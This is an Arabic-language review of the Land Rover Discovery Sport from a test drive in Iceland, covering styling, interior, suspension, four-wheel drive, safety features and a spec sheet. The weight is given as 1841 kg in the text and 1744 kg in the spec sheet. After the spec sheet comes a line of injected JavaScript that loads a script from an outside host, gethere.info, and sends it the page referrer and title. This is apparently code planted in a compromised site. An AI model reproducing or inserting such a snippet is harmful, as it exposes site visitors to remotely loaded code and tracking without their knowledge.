لاند روفر ديسكفري سبورت … اكثر من مميزة

مجموعة لاند روفر جاكوار تعيش في السنوات القليلة الماضية قصة نجاح غير معهودة، فقد استطاعت الشركة البريطانية النهوض من جديد بعد انتقال ملكيتها إلى شركة TATA الهندية التي اطلقت العنان وبشكل ذكي جداً للشركة البريطانية لتقوم الأخيرة بأطلاق طرازات لاقت وتلاقي نجاحاً باهراً. وجديد فرع لاند روفر هو سيارة SUV متوسطة اطلق عليها تسمية ديسكفري سبورت، هي الطراز الأول ضمن مجموعة عائلة ديسكفري التي سوف تضم لاحقاً طرازات عدة جديدة في ظل اعادة لاند روفر لهيكلة انتاجها التي اصبحت تضم اليوم ثلاث فئات وهي رينج روفر المخصصة للأنتاج الفخم ذات القدرات العالية، لاند روفر المتمحورة حول انتاج سيارات ذات جودة عالية وعائلية الطبع بالأضافة إلى فئة ديفندر التي من خلالها سوف تقوم لاند روفر بأنتاج سيارات ذات فدرات استثنائية على الطرقات الوعرة. كان لنا لقاء مع جديد لاند رفور ديسكفري سبورت في إسلندا حيث قمنا بأختبار هذه السيارة الجديدة على تضاريس صعبة كان القسم الاكبر منها يتضم قيادة على طرقات ثلجية وعبور للأنهر المجلدة، لنعود اليكم بالتقرير التالي.

من النظرة الاولى على سيارة ديسكفري سبورت بالأمكان التعرف عليها على الفور بأنها سيارة تنتمي إلى مجموعة الصانع البريطاني وبالأخص هي مشابهة إلى حد ما إلى رينج روفر إفوك خاصة لناحية المقايس حيث تتشارك معها العديد من التجهيزات خاصة الميكانيكية والبنياوية منها. لكن بشكل عام التصميم رياضي مدمج وانيق وفخم كما جرت العادة مع باقي سيارات مجموعة لاند روفر.

وتمتاز ديسكفري سبورت ببنية مدمجة بطول 4590 ملم، أي أقصر بـ 239 ملم من شقيقتها الكبرى لاند روفر ديسكفري ذات المقاعد السبعة، بينما تسهم قاعدة العجلات المتميزة بطول 2741 ملم في خلق مساحة واسعة للأرجل. وقد سمح هذا الأمر لمصممي لاند روفر بسحب العجلات إلى الخارج نحو الزوايا الأربع للمركبة، مما أثمر عن منح ديسكفري سبورت الجديدة مظهراً مدمجاً ملفتاً للنظر، مع انخفاض مركز الثقل بشكل يوحي برشاقة وخفة حركة ديسكفري سبورت. كما تسهم الزوايا الأنيقة المنحنية في تخفيض الأثر البصري لبروز مقدمة المركبة.

وتم تجهيز جميع سيارات ديسكفري سبورت بمصابيح هالوجينية ومصابيح نهارية دائرية، وتتضمن الزينة العلوية مصابيح Signature، كما بأمكانكم الأختيار أيضاً مصابيح Signature Plus. وتتميز مصابيح Signature بتقنيتي الزينون والـ LED، في حين تضيف مصابيح Signature Plus تقنية الانعطاف التكيفي لتوجيه شعاع الضوء مع زاوية توجيه السائق.

وتتماشى المصابيح الخلفية مع التصميم الأنيق لتصميم المصابيح الأمامية، وذلك من خلال تصميم منحنٍ مميز، وخيار الحصول على مصابيح قياسية أو مصابيح Signature.

مقصورة ديسكفري سبورت تم تصميمها بعناية، باستخدام مواد عالية الجودة، وكونسول مركزي عمودي يحتوي على شاشة لعرض البيانات ونظام الترفيه قياس 8 إنش تعمل باللمس وجدناها عملية جداً وقريبة من حيث المفهوم لعمل الهواتف الذكية.

كما تمتاز مقصورة ديسكفري سبورت الجديدة بكونها الوحيدة ضمن فئتها التي تحتوي على ثلاث صفوف من المقاعد أي انها قادرة عند الحاجة، استعاب 7 ركاب دون التضحية بسعة التحميل حيث يمكن زيادة حجم الحمولة حسب الرغبة من 829 ليتر وحتى 981 ليتر مع مقاعد الصف الثاني.

ومع تزويدها بنظام تعليق مرن إلى جانب المحور الخلفي متعدد الوصلات، تؤمن ديسكفري سبورت مستويات عالية من الراحة والأداء أثناء القيادة على الطرق الممهدة مع الحفاظ على القدرات التي تشتهر بها لاند روفر للقيادة على جميع أنواع التضاريس. ومن خلال خلصوها المرتفع عن الأرض البالغ 212 ملم وزوايا الاقتراب والمغادرة وعبور العوائق التي تبلغ 25 و31 و21 درجة على التوالي، إلى جانب نظام الاستجابة للتضاريس، والقدرة على خوض المياه حتى عمق 660 ميلليمترا، تقدم ديسكفري سبورت مستويات أداء فعلاً مميزة ضمن فئتها في جميع الظروف وهذا أمر قمنا بأختباره خلال هذه التجربة حيث كان من السهل جداً التعامل مع ديسكفري سبورت في ظل التضاريس الصعبة والزلقة لإسلاندا حيث لم نواجه أي مشكلة تذكر خلال هذه التجربة ان كان لناحية عبور الانهار او للقايدة على الطرقات المكثوة بالثلوج والجليد.

ديسكفري سبورت وكما ذكرنا في السابق تتشارك بعض اجزاء بنيتها مع ابنة عمها رينج روفر إيفوك لكن مع بعض التعديلات يبقى ابرزها في قاعدة العجلات التي هي اطول بـ 80 ملم مع ديسكفرس سبورت وهو امر بديهي كون السيارة مجهزة بثلاث صفوف من المقاعد وهي ايضاً تتشارك معها العديد من التجهيزات الميكانيكية يبقى ابرزها محرك السيارة المؤلف من 4 أسطوانات سعة 2 ليتر مع توربو والقادر على توليد قوة 240 حصان عند 5800 دورة في الدقيقة مع عزم دوران يبلغ 340 نيوتن متر متوفرة عند دوران منخفض للمحرك يبلغ فقط 1750 دورة في الدقيقة وصولاً إلى 4000 دورة في الدقيقة الأمر الذي فعلاً اعطى مرونة هائلة لـ ديسكفري سبورت وتجعلك تشعر بأنك لست بحاجة إلى محرك أكبر على الأطلاق. ويساهم في اداء هذا المحرك علبة تروس أوتوماتيكية من 9 نسب يمكن التحكم بنسبها بشكل يدوي من خلال مكابس موجودة على مقوض السيارة لتحكم أفضل، تنقل قوة هذا المحرك إلى العجلات الاربع الدافعة.

اما بخصوص ارقام التأدية، تستطيع لاند روفر ديسكفري سبورت البالغ وزنها 1841 كلغ الانطلاق من صفر إلى 100 كلم/ساعة في خلال 8 ثواني وعشرين من الثانية بينما تصل سرعتها القصوى إلى 200 كلم/ساعة.

نظام التعليق الخاص بـ ديسكفري سبورت هو عنصر اساسي في ديناميكية السيارة المميزة التي خلال قيادتها على الطرق المعبدة تشعر وكأنك تقود سيارة هاتشباك صغيرة وليس سيارة SUV لكنها في نفس الوقت قادرة على عبور الانهر المجلدة والسير على الطرقات الغير ممهدة.

ويتألف نظان التعليق هذا في المقدمة نوابض لولبية معززة بأذرع تحكم أمامية سفلية مصنوعة من الفولاذ وبراجم تعليق مصنوعة من الألمنيوم، بينما تستخدم دعامات التخميد مخمدات هيدروليكية متطورة مقاومة للارتداد لتعزيز سلاسة القيادة والتحكم. وتخفض هذه الترتيبات إلى حد كبير من الضجيج الذي يتسلل إلى مقصورة الركاب لدى ارتداد المخمدات بعد عبورها لحفرة عميقة على الطريق.

ويوفر المحور الخلفي متعدد الوصلات والمدمج الجديد العديد من المزايا للمركبة؛ بما في ذلك رشاقة لدى القيادة على الطرقات الممهدة كما ذكرنا من قبل وقدرة عالية لدوران العجلات وتحرك مفاصل المحور بواقع 340 ملم بزيادة قدرها 60 ملم عن المركبات المنافسة. ويخفض المحور الخلفي الجديد من ضجيج الطريق الذي يتسلل إلى مقصورة ركاب المركبة ويخفضه إلى الحد الأدنى في صندوق الأمتعة، ويتيح لمقاعد الصف الثاني القدرة على الانزلاق والميلان للخلف متجاوزة قوائم تثبيت المقاعد لتوفير أقصى مساحة ممكنة للأقدام. كما يلعب المحور الخلفي متعدد الوصلات الجديد بالكامل دوراً رئيسياً في تأمين مرونة تصميم مقاعد 5+2 والمساحة الكبيرة لتخزين الأمتعة في مركبة مدمجة الحجم.

وتتوفر مخمدات الصدمات العاملة بتقنية الديناميكيات التكيفية MagneRide التي تتيح تعديل نمط التعليق بشكل سريع جداً وبحسب متطلبات الطريق التي تقودون عليها.

جميع طرازات ديسكفري سبورت الجديدة مزودة بنظام دفع رباعي ذكي الذي، يقوم باستمرار بتغيير نسب توزيع عزم الدوران بين العجلات الأمامية والخلفية. وتم تخفيض وزن ترس التعشيق المركزي الحديث Haldex الآن بمقدار 4 كيلوغرامات، مع إضافة ميزة التحكم به إلكترونياً، ومما يتيه له الاستجابة لانزلاق العجلات ومتطلبات السائق بشكل أسرع بكثير من تروس التعشيق الميكانيكية البحتة. ويوفر هذا الأمر قدرة ممتازة على الأراضي الوعرة مع تعزيز خفة الحركة على الطرقات الممهدة.

ويعزز نظام الاستجابة للتضاريس من أداء ديسكفري سبورت من قدراتها. يمكن التحكم بالنظام بشهولة عبر واجهة سهلة الاستخدام على الكونسول المركزي، يسمح نظام الاستجابة للتضاريس بتخصيص أداء نظام التوجيه، واستجابة دواسة الوقود، وعلبة التروس، والتعشيق المركزي، وأنظمة الفرملة/الثبات بدقة حسبما تتطلب التضاريس. كما يقدم نظام الاستجابة للتضاريس أربعة إعدادات: وضع القيادة العامة، والقيادة على العشب/الحصى/الثلوج (للظروف الزلقة على الطرق الممهدة والوعرة)، والقيادة على الوحل والأخاديد، والقيادة على الرمال.

إلى جانب انظمة السلامة العديدة المتطورة على متن ديسكفري سبورت، تم تزويد سيارة لاند روفر ولأول مرة بوسادة أمان هوائية خاصة بحماية المشاة مثبت بين غطاء المحرك وعمود المصد الأمامي للمركبة، ترصد حالات الاصطدام بالمشاة لتطلق آلية عمل الوسادة. وفي حالة اصطدام المركبة بأي من المشاة وهي تنطلق بسرعة تتراوح بين 24 و48 كيلومتراً في الساعة، تنفتح وسادة أمان هوائية مخفية تحت لوح صغير مثبت إلى قاعدة الزجاج الأمامي للمركبة خلال مدة لا تتجاوز 60 جزءاً من الثانية، لتخفف بذلك بشكل حاسم من تعَرُّض المشاة لإصابات خطيرة.

في النهاية لا بد من القول بأن سيارة ديسكفري سبورت الجديدة هي فعلاً سيارة متميزة في فئتها من السيارات ان كان لناحية تجهيزاتها كافة او لناحية قدراتها العالية جداً الكفيلة بأنتشالكم من اي مأزق قد تقعون فيه (بالطبع ضمن حدود المعقول)  بسهولة ومن دون اي عناء. هذه التجربة المميزة في إسلندا سوف تبقى في ذاكرتنا لوقت طويل كوننا استطعنا الاستمتاع برهبة طبيعة هذا البلد الخلابة والقاتلة في الوقت نفسه، بكل راحة على متن ديسكفري سبورت.

[separator]

البطاقة التقنية لـ لاند روفر ديسكفري سبورت

الاندفاع: رباعي

عدد الاسطوانات: 4

السعة (ليتر): 2 مع توربو

القوة (حصان/ د.د.): 240/ 5800

عزم الدوران (ن – م/ د.د.): 340/ 1750

من صفر الى 100 كلم/س (ثانية): 8.2

السرعة القصوى (كلم/س): 200

الوزن (كلغ): 1744

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;